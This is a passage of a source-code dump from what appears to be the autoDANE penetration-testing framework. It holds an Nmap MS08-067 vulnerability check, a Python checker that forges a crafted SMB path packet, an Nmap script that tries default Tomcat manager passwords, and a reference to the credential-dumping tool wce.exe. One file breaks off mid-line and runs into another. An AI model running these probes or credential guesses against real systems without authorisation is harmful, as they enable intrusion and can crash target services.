138 | -- Based on a packet cap of this script, thanks go out to the author:
139 | -- http://labs.portcullis.co.uk/application/ms08-067-check/
140 | --
141 | -- If there's a licensing issue, please let me (Ron Bowes) know so I can
142 | --
143 | -- NOTE: This CAN crash stuff (ie, crash svchost and force a reboot), so beware! In about 20
144 | -- tests I did, it crashed once. This is not a guarantee.
145 | --
146 | --@param host The host object.
147 | --@return (status, result) If status is false, result is an error code; otherwise, result is either
148 | -- VULNERABLE for vulnerable, PATCHED for not vulnerable,
149 | -- UNKNOWN if there was an error (likely vulnerable), NOTRUN
150 | -- if this check was disabled, and INFECTED if it was patched by Conficker.
151 | function check_ms08_067(host)
152 | -- if(nmap.registry.args.safe ~= nil) then
153 | -- return true, NOTRUN
154 | -- end
155 | -- if(nmap.registry.args.unsafe == nil) then
156 | -- return true, NOTRUN
157 | -- end
158 | local status, smbstate
159 | local bind_result, netpathcompare_result
160 |
161 | -- Create the SMB session
162 | status, smbstate = msrpc.start_smb(host, "\\\\BROWSER")
163 | if(status == false) then
164 | return false, smbstate
165 | end
166 |
167 | -- Bind to SRVSVC service
168 | status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
169 | if(status == false) then
170 | msrpc.stop_smb(smbstate)
171 | return false, bind_result
172 | end
173 |
174 | -- Call netpathcanonicalize
175 | -- status, netpathcanonicalize_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\a", "\\test\\")
176 |
177 | local path1 = "\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\..\\n"
178 | local path2 = "\\n"
179 | status, netpathcompare_result = msrpc.srvsvc_netpathcompare(smbstate, host.ip, path1, path2, 1, 0)
180 |
181 | -- Stop the SMB session
182 | msrpc.stop_smb(smbstate)
183 |
184 | if(status == false) then
185 | if(string.find(netpathcompare_result, "WERR_INVALID_PARAMETER") ~= nil) then
186 | return true, INFECTED
187 | elseif(string.find(netpathcompare_result, "INVALID_NAME") ~= nil) then
188 | return true, PATCHED
189 | else
190 | return true, UNKNOWN, netpathcompare_result
191 | end
192 | end
193 |
194 |
195 | return true, VULNERABLE
196 | end
197 |
198 | ---Returns the appropriate text to display, if any.
199 | --
200 | --@param check The name of the check; for example, 'ms08-067'.
201 | --@param message The message to display, such as 'VULNERABLE' or 'PATCHED'.
202 | --@param description [optional] Extra details about the message. nil for a blank message.
203 | --@param minimum_verbosity The minimum verbosity level required before the message is displayed.
204 | --@param minimum_debug [optional] The minimum debug level required before the message is displayed (default: 0).
205 | --@return A string with a textual representation of the error (or empty string, if it was determined that the message shouldn't be displayed).
206 | local function get_response(check, message, description, minimum_verbosity, minimum_debug)
207 | if(minimum_debug == nil) then
208 | minimum_debug = 0
209 | end
210 |
211 | -- Check if we have appropriate verbosity/debug
212 | if(nmap.verbosity() >= minimum_verbosity and nmap.debugging() >= minimum_debug) then
213 | if(description == nil or description == '') then
214 | return string.format("%s: %s", check, message)
215 | else
216 | return string.format("%s: %s (%s)", check, message, description)
217 | end
218 | else
219 | return nil
220 | end
221 | end
222 |
223 | action = function(host)
224 |
225 | local status, result, message
226 | local response = {}
227 |
228 | -- Check for ms08-067
229 | status, result, message = check_ms08_067(host)
230 | if(status == false) then
231 | table.insert(response, get_response("MS08-067", "ERROR", result, 0, 1))
232 | else
233 | if(result == VULNERABLE) then
234 | table.insert(response, get_response("MS08-067", "VULNERABLE", nil, 0))
235 | elseif(result == UNKNOWN) then
236 | table.insert(response, get_response("MS08-067", "LIKELY VULNERABLE", "host stopped responding", 1)) -- TODO: this isn't very accurate
237 | elseif(result == NOTRUN) then
238 | table.insert(response, get_response("MS08-067", "CHECK DISABLED", "add '--script-args=unsafe=1' to run", 1))
239 | elseif(result == INFECTED) then
240 | table.insert(response, get_response("MS08-067", "NOT VULNERABLE", "likely by Conficker", 0))
241 | else
242 | table.insert(response, get_response("MS08-067", "NOT VULNERABLE", nil, 1))
243 | end
244 | end
245 |
246 | return stdnse.format_output(true, response)
247 | end
248 |
--------------------------------------------------------------------------------
/software/ms08-067_check/ms08-067_check.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | '''
4 | Name: Microsoft Server Service Remote Path Canonicalization Stack Overflow Vulnerability
5 |
6 | Description:
7 | Anonymously check if a target machine is affected by MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution)
8 |
9 | Author: Bernardo Damele A. G.
10 |
11 | License: Modified Apache 1.1
12 |
13 | Version: 0.6
14 |
15 | References:
16 | * BID: 31874
17 | * CVE: 2008-4250
18 | * MSB: MS08-067
19 | * VENDOR: http://blogs.technet.com/swi/archive/2008/10/25/most-common-questions-that-we-ve-been-asked-regarding-ms08-067.aspx
20 | * VENDOR: http://www.microsoft.com/technet/security/advisory/958963.mspx
21 | * MISC: http://www.phreedom.org/blog/2008/decompiling-ms08-067/
22 | * MISC: http://metasploit.com/dev/trac/browser/framework3/trunk/modules/exploits/windows/smb/ms08_067_netapi.rb
23 | * MISC: http://blog.threatexpert.com/2008/10/gimmiva-exploits-zero-day-vulnerability.html
24 | * MISC: http://blogs.securiteam.com/index.php/archives/1150
25 |
26 | Tested:
27 | * Windows 2000 Server Service Pack 0
28 | * Windows 2000 Server Service Pack 4 with Update Rollup 1
29 | * Microsoft 2003 Standard Service Pack 1
30 | * Microsoft 2003 Standard Service Pack 2 Full Patched at 22nd of October 2008, before MS08-067 patch was released
31 |
32 | Notes:
33 | * On Windows XP SP2 and SP3 this check might lead to a race condition and
34 | heap corruption in the svchost.exe process, but it may not crash the
35 | service immediately: it can trigger later on inside any of the shared
36 | services in the process.
37 | '''
38 |
39 |
40 | import socket
41 | import sys
42 |
43 | from optparse import OptionError
44 | from optparse import OptionParser
45 | from random import choice
46 | from string import letters
47 | from struct import pack
48 | from threading import Thread
49 | from traceback import format_exc
50 |
51 | try:
52 | from impacket import smb
53 | from impacket import uuid
54 | from impacket.dcerpc import dcerpc
55 | from impacket.dcerpc import transport
56 | except ImportError, _:
57 | print 'ERROR: this tool requires python-impacket library to be installed, get it '
58 | print 'from http://oss.coresecurity.com/projects/impacket.html or apt-get install python-impacket'
59 | sys.exit(1)
60 |
61 | try:
62 | from ndr import *
63 | except ImportError, _:
64 | print 'ERROR: this tool requires python-pymsrpc library to be installed, get it '
65 | print 'from http://code.google.com/p/pymsrpc/'
66 | sys.exit(1)
67 |
68 |
69 | CMDLINE = False
70 | SILENT = False
71 |
72 |
73 | class connectionException(Exception):
74 | pass
75 |
76 |
77 | class MS08_067(Thread):
78 | def __init__(self, target, port=445):
79 | super(MS08_067, self).__init__()
80 |
81 | self.__port = port
82 | self.target = target
83 | self.status = 'unknown'
84 |
85 |
86 | def __checkPort(self):
87 | '''
88 | Open connection to TCP port to check if it is open
89 | '''
90 |
91 | try:
92 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
93 | s.settimeout(1)
94 | s.connect((self.target, self.__port))
95 | s.close()
96 |
97 | except socket.timeout, _:
98 | raise connectionException, 'connection timeout'
99 |
100 | except socket.error, _:
101 | raise connectionException, 'connection refused'
102 |
103 |
104 | def __connect(self):
105 | '''
106 | SMB connect to the Computer Browser service named pipe
107 | Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html
108 | '''
109 |
110 | try:
111 | self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
112 | self.__trans.connect()
113 |
114 | except smb.SessionError, _:
115 | raise connectionException, 'access denied (RestrictAnonymous is probably set to 2)'
116 |
117 | except:
118 | #raise Exception, 'unhandled exception (%s)' % format_exc()
119 | raise connectionException, 'unexpected exception'
120 |
121 |
122 | def __bind(self):
123 | '''
124 | DCERPC bind to SRVSVC (Server Service) endpoint
125 | Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html
126 | '''
127 |
128 | try:
129 | self.__dce = self.__trans.DCERPC_class(self.__trans)
130 |
131 | self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
132 |
133 | except socket.error, _:
134 | raise connectionException, 'unable to bind to SRVSVC endpoint'
135 |
136 | except:
137 | #raise Exception, 'unhandled exception (%s)' % format_exc()
138 | raise connectionException, 'unexpected exception'
139 |
140 |
141 | def __forgePacket(self):
142 | '''
143 | Forge the malicious NetprPathCompare packet
144 |
145 | Reference: http://msdn.microsoft.com/en-us/library/cc247259.aspx
146 |
147 | long NetprPathCompare(
148 | [in, string, unique] SRVSVC_HANDLE ServerName,
149 | [in, string] WCHAR* PathName1,
150 | [in, string] WCHAR* PathName2,
151 | [in] DWORD PathType,
152 | [in] DWORD Flags
153 | );
154 | '''
155 |
156 | self.__path = ''.join([choice(letters) for _ in xrange(0, 3)])
157 |
158 | self.__request = ndr_unique(pointer_value=0x00020000, data=ndr_wstring(data='')).serialize()
159 | self.__request += ndr_wstring(data='\\%s\\..\\%s' % ('A'*5, self.__path)).serialize()
160 | self.__request += ndr_wstring(data='\\%s' % self.__path).serialize()
161 | self.__request += ndr_long(data=1).serialize()
162 | self.__request += ndr_long(data=0).serialize()
163 |
164 |
165 | def __compare(self):
166 | '''
167 | Compare NetprPathCompare response field 'Windows Error' with the
168 | expected value (WERR_OK) to confirm the target is vulnerable
169 | '''
170 |
171 | self.__vulnerable = pack('
26 | -- Todo: Better identification of tomcat
27 | -- Checkout: http://www.binaryvision.org.il/
28 | -----------------------------------------------------------------
29 |
30 | author = "spdr"
31 |
32 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
33 |
34 | categories = {"default", "auth", "intrusive"}
35 |
36 | local shortport = require "shortport"
37 | local http = require "http"
38 |
39 | portrule = shortport.http
40 |
41 | action = function(host, port)
42 | local www_authenticate
43 | local challenges, basic_challenge
44 | local authcombinations= {
45 | { username = "admin", password = ""},
46 | { username = "admin", password = "admin"},
47 | { username = "admin", password = "tomcat"},
48 | { username = "admin", password = "manager"},
49 | { username = "admin", password = "secret"},
50 | { username = "admin", password = "1234"},
51 | { username = "admin", password = "12345"},
52 | { username = "admin", password = "123456"},
53 | { username = "admin", password = "12345678"},
54 | { username = "admin", password = "password"},
55 | { username = "admin", password = "changeit"},
56 | { username = "admin", password = "changeme"},
57 | { username = "tomcat", password = "tomcat"},
58 | { username = "tomcat", password = ""},
59 | { username = "tomcat", password = "admin"},
60 | { username = "tomcat", password = "manager"},
61 | { username = "tomcat", password = "secret"},
62 | { username = "tomcat", password = "1234"},
63 | { username = "tomcat", password = "12345"},
64 | { username = "tomcat", password = "123123"},
65 | { username = "tomcat", password = "123321"},
66 | { username = "tomcat", password = "123456"},
67 | { username = "tomcat", password = "12345678"},
68 | { username = "manager", password = "manager"},
69 | { username = "manager", password = "tomcat"},
70 | { username = "manager", password = "admin"},
71 | { username = "manager", password = "1234"},
72 | { username = "manager", password = "12345"},
73 | { username = "manager", password = "123456"},
74 | { username = "manager", password = "123123"},
75 | { username = "manager", password = "1234578"},
76 | { username = "QCC", password = "QLogic66"},
77 | }
78 |
79 | local result = {}
80 | local answer = http.get(host, port, "/manager/html")
81 | local jboss = http.get(host, port, "/jmx-console/HtmlAdaptor")
82 |
83 | --- check for HTTP 404
84 | if answer.status == 404 then
85 | result[#result + 1] = string.format("/manager/html is HTTP %d.", answer.status)
86 | if jboss.status == 200 then
87 | result[#result + 1] = string.format("[+] Jboss JMX console is HTTP %d !", jboss.status)
88 | end
89 | return table.concat(result, "\n")
90 | end
91 |
92 | --- check for 401 response code
93 | if answer.status ~= 401 then
94 | result[#result + 1] = string.format("No auth required. (HTTP %d)", answer.status)
95 | return table.concat(result, "\n")
96 | end
97 |
98 | result[#result + 1] = answer["status-line"]
99 |
100 | www_authenticate = answer.header["www-authenticate"]
101 | if not www_authenticate then
102 | result[#result + 1] = string.format("Server returned status %d but no WWW-Authenticate.", answer.status)
103 | return table.concat(result, "\n")
104 | end
105 | challenges = http.parse_www_authenticate(www_authenticate)
106 | if not challenges then
107 | result[#result + 1] = string.format("Server returned status %d but the WWW-Authenticate header could not be parsed.", answer.status)
108 | result[#result + 1] = string.format("WWW-Authenticate: %s", www_authenticate)
109 | return table.concat(result, "\n")
110 | end
111 |
112 | basic_challenge = nil
113 | for _, challenge in ipairs(challenges) do
114 | if challenge.scheme == "Basic" then
115 | basic_challenge = challenge
116 | end
117 | local line = challenge.scheme
118 | for name, value in pairs(challenge.params) do
119 | line = line .. string.format(" %s=%s", name, value)
120 | if value ~= "Tomcat Manager Application" then -- Its not tomcat, save the effort ...
121 | result[#result + 1] = string.format("%s is not tomcat.", value)
122 | return table.concat(result, "\n")
123 | end
124 | end
125 | result[#result + 1] = line
126 | end
127 |
128 | if basic_challenge then
129 | for _, auth in ipairs(authcombinations) do
130 | answer = http.get(host, port, '/manager/html', {auth = auth})
131 | if answer.status == 403 then
132 | result[#result + 1] = string.format("[=] Tomcat will accept %s:%s, but management is disbaled.", auth.username, auth.password, answer.status)
133 | return table.concat(result, "\n")
134 | end
135 | if answer.status ~= 401 and answer.status ~= 403 then
136 | result[#result + 1] = string.format("[+] Found combination %s:%s !", auth.username, auth.password)
137 | return table.concat(result, "\n")
138 | end
139 | end
140 | if answer.status == 401 then
141 | result[#result + 1] = string.format("[-] The password was not found.")
142 | end
143 | end
144 |
145 | return table.concat(result, "\n")
146 | end
147 |
--------------------------------------------------------------------------------
/software/wce/test.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/wce/test.txt
--------------------------------------------------------------------------------
/software/wce/wce.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/wce/wce.exe
--------------------------------------------------------------------------------
/splash/Ui_dbconnecting.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Form implementation generated from reading ui file '/home/dane/projects/autodane/autodane_pg/splash/dbconnecting.ui'
4 | #
5 | # Created by: PyQt4 UI code generator 4.11.4
6 | #
7 | # WARNING! All changes made in this file will be lost!
8 |
9 | from PyQt4 import QtCore, QtGui
10 |
11 | try:
12 | _fromUtf8 = QtCore.QString.fromUtf8
13 | except AttributeError:
14 | def _fromUtf8(s):
15 | return s
16 |
17 | try:
18 | _encoding = QtGui.QApplication.UnicodeUTF8
19 | def _translate(context, text, disambig):
20 | return QtGui.QApplication.translate(context, text, disambig, _encoding)
21 | except AttributeError:
22 | def _translate(context, text, disambig):
23 | return QtGui.QApplication.translate(context, text, disambig)
24 |
25 | class Ui_Dialog(object):
26 | def setupUi(self, Dialog):
27 | Dialog.setObjectName(_fromUtf8("Dialog"))
28 | Dialog.resize(581, 433)
29 | Dialog.setSizeGripEnabled(True)
30 | self.gridLayout = QtGui.QGridLayout(Dialog)
31 | self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
32 | self.verticalLayout = QtGui.QVBoxLayout()
33 | self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
34 | self.horizontalLayout_4 = QtGui.QHBoxLayout()
35 | self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
36 | spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
37 | self.horizontalLayout_4.addItem(spacerItem)
38 | self.lblDBLogo = QtGui.QLabel(Dialog)
39 | self.lblDBLogo.setMinimumSize(QtCore.QSize(310, 310))
40 | self.lblDBLogo.setObjectName(_fromUtf8("lblDBLogo"))
41 | self.horizontalLayout_4.addWidget(self.lblDBLogo)
42 | spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
43 | self.horizontalLayout_4.addItem(spacerItem1)
44 | self.verticalLayout.addLayout(self.horizontalLayout_4)
45 | spacerItem2 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
46 | self.verticalLayout.addItem(spacerItem2)
47 | self.horizontalLayout_3 = QtGui.QHBoxLayout()
48 | self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
49 | self.label = QtGui.QLabel(Dialog)
50 | self.label.setObjectName(_fromUtf8("label"))
51 | self.horizontalLayout_3.addWidget(self.label)
52 | self.verticalLayout.addLayout(self.horizontalLayout_3)
53 | self.horizontalLayout_2 = QtGui.QHBoxLayout()
54 | self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
55 | self.lblError = QtGui.QLabel(Dialog)
56 | self.lblError.setObjectName(_fromUtf8("lblError"))
57 | self.horizontalLayout_2.addWidget(self.lblError)
58 | self.verticalLayout.addLayout(self.horizontalLayout_2)
59 | self.horizontalLayout = QtGui.QHBoxLayout()
60 | self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
61 | spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
62 | self.horizontalLayout.addItem(spacerItem3)
63 | self.btnCancel = QtGui.QPushButton(Dialog)
64 | self.btnCancel.setObjectName(_fromUtf8("btnCancel"))
65 | self.horizontalLayout.addWidget(self.btnCancel)
66 | self.verticalLayout.addLayout(self.horizontalLayout)
67 | self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
68 |
69 | self.retranslateUi(Dialog)
70 | QtCore.QMetaObject.connectSlotsByName(Dialog)
71 |
72 | def retranslateUi(self, Dialog):
73 | Dialog.setWindowTitle(_translate("Dialog", "Connecting to DB", None))
74 | self.lblDBLogo.setText(_translate("Dialog", "DB Logo", None))
75 | self.label.setText(_translate("Dialog", "Connecting ", None))
76 | self.lblError.setText(_translate("Dialog", "...", None))
77 | self.btnCancel.setText(_translate("Dialog", "Cancel", None))
78 |
79 |
80 | if __name__ == "__main__":
81 | import sys
82 | app = QtGui.QApplication(sys.argv)
83 | Dialog = QtGui.QDialog()
84 | ui = Ui_Dialog()
85 | ui.setupUi(Dialog)
86 | Dialog.show()
87 | sys.exit(app.exec_())
88 |
89 |
--------------------------------------------------------------------------------
/splash/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/splash/__init__.py
--------------------------------------------------------------------------------
/splash/dbconnecting.py:
--------------------------------------------------------------------------------
1 | from PyQt4 import QtGui, QtCore
2 | from PyQt4.QtCore import pyqtSignature, pyqtSignal
3 | from PyQt4.QtGui import *
4 |
5 |
6 | from PyQt4.QtCore import QString
7 | #from PyQt4.QtGui import QApplication
8 |
9 | import ConfigParser
10 | import threading
11 | import psycopg2
12 | import time
13 |
14 | from .Ui_dbconnecting import Ui_Dialog
15 |
16 | class DBConnecting(QDialog, Ui_Dialog):
17 | tickLabelTimerTrigger = pyqtSignal()
18 | tickLabelTimer = None
19 | currentDotsVal = ""
20 | connectedToDB = False
21 | errorMessage = ""
22 | conf = ConfigParser.ConfigParser()
23 |
24 | def __init__(self, parent=None):
25 | QDialog.__init__(self, parent)
26 | self.setupUi(self)
27 | self.conf.read("settings.ini")
28 | self.tickLabelTimerTrigger.connect(self.handletickLabelTimerTrigger)
29 | self.tickLabelTimer = threading.Timer(0.5, self.calltickLabelTimerTrigger)
30 | self.tickLabelTimer.start()
31 |
32 | logoPixmap = QtGui.QPixmap(QString.fromUtf8('images/db-connection.jpg'))
33 | logoScaledPixmap = logoPixmap.scaled(self.lblDBLogo.size(), QtCore.Qt.KeepAspectRatio)
34 | self.lblDBLogo.setPixmap(logoScaledPixmap)
35 |
36 | def calltickLabelTimerTrigger(self):
37 | try:
38 | psycopg2.connect(host=self.conf.get('postgres', 'host'), user=self.conf.get('postgres', 'user'), password=self.conf.get('postgres', 'pass'), dbname=self.conf.get('postgres', 'db'))
39 | self.connectedToDB = True
40 | except Exception as e:
41 | self.errorMessage = str(e)
42 | time.sleep(1)
43 |
44 | self.tickLabelTimerTrigger.emit()
45 |
46 | def handletickLabelTimerTrigger(self):
47 | if (self.connectedToDB):
48 | self.accept()
49 | else:
50 | threading.Timer(0.5, self.calltickLabelTimerTrigger).start()
51 | self.currentDotsVal += "."
52 | if self.currentDotsVal == "....":
53 | self.currentDotsVal = ""
54 |
55 | self.label.setText("Connecting " + self.currentDotsVal)
56 | self.lblError.setText(self.errorMessage)
57 |
58 | @pyqtSignature("")
59 | def on_btnCancel_clicked(self):
60 | self.reject()
61 |
--------------------------------------------------------------------------------
/splash/dbconnecting.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 | Dialog
4 |
5 |
6 |
7 | 0
8 | 0
9 | 581
10 | 433
11 |
12 |
13 |
14 | Connecting to DB
15 |
16 |
17 | true
18 |
19 |
20 | -
21 |
22 |
-
23 |
24 |
-
25 |
26 |
27 | Qt::Horizontal
28 |
29 |
30 |
31 | 40
32 | 20
33 |
34 |
35 |
36 |
37 | -
38 |
39 |
40 |
41 | 310
42 | 310
43 |
44 |
45 |
46 | DB Logo
47 |
48 |
49 |
50 | -
51 |
52 |
53 | Qt::Horizontal
54 |
55 |
56 |
57 | 40
58 | 20
59 |
60 |
61 |
62 |
63 |
64 |
65 | -
66 |
67 |
68 | Qt::Vertical
69 |
70 |
71 |
72 | 20
73 | 40
74 |
75 |
76 |
77 |
78 | -
79 |
80 |
-
81 |
82 |
83 | Connecting
84 |
85 |
86 |
87 |
88 |
89 | -
90 |
91 |
-
92 |
93 |
94 | ...
95 |
96 |
97 |
98 |
99 |
100 | -
101 |
102 |
-
103 |
104 |
105 | Qt::Horizontal
106 |
107 |
108 |
109 | 40
110 | 20
111 |
112 |
113 |
114 |
115 | -
116 |
117 |
118 | Cancel
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
--------------------------------------------------------------------------------
/truncate:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | sudo -su postgres bash -c "psql autodane < truncate.sql"
4 | rm logs/*
5 | rm temp/*
6 |
--------------------------------------------------------------------------------
/truncate.sql:
--------------------------------------------------------------------------------
1 | truncate table domain_credentials restart identity;
2 | truncate table domain_credentials_map restart identity;
3 | truncate table domain_groups restart identity;
4 | truncate table domain_user_group_map restart identity;
5 | truncate table domains restart identity;
6 | truncate table exploit_logs restart identity;
7 | truncate table footprints restart identity;
8 | truncate table host_data restart identity;
9 | truncate table local_credentials restart identity;
10 | truncate table local_credentials_map restart identity;
11 | truncate table net_ranges restart identity;
12 | truncate table port_data restart identity;
13 | truncate table scope restart identity;
14 | truncate table task_list restart identity;
15 | truncate table tokens restart identity;
16 | truncate table vulnerabilities restart identity;
17 | truncate table websites restart identity;
18 |
--------------------------------------------------------------------------------
/worker/.workerthread.py.swo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/worker/.workerthread.py.swo
--------------------------------------------------------------------------------
/worker/.workerthread.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/worker/.workerthread.py.swp
--------------------------------------------------------------------------------
/worker/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/worker/__init__.py
--------------------------------------------------------------------------------